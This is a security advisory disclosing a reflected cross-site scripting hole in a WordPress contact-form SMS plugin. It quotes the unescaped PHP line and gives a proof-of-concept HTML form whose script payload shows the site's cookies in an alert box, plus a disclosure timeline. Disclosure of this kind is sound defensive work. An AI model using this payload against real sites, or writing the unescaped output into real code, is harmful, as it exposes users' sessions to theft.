Last month we were trying to get an idea of how effective it would be to try to proactively catch some vulnerabilities when changes are made to WordPress plugins that include those vulnerabilities. In doing one of the preliminary checks we came across a reflected cross-site scripting (XSS) vulnerability that exists in the plugin Contact Form 7 International Sms Integration.
On line 366 of the file /includes/admin/class-sms-log-display.php the value of GET or POST input “page” is output without being escaped:
<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
While the GET input “page” needs to be set to “cf7-international-sms-integration-settings” for that code to run, the POST input can be set to another value and depending on the configuration of PHP will be the one chosen to be output.
We notified the developer of the issue a month ago, they promptly responded that they would fix it “asap”, but so far the plugin has not been updated.
Proof of Concept
The following proof of concept will cause any available cookies to be shown in alert box. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin.php?page=cf7-international-sms-integration-settings&tab=smslogs" method="POST"> <input type="hidden" name="page" value='"><script>alert(document.cookie);</script>' /> <input type="submit" value="Submit" /> </form> </body> </html>
- June 19, 2017 – Developer notified.
- June 19, 2017 – Developer responded.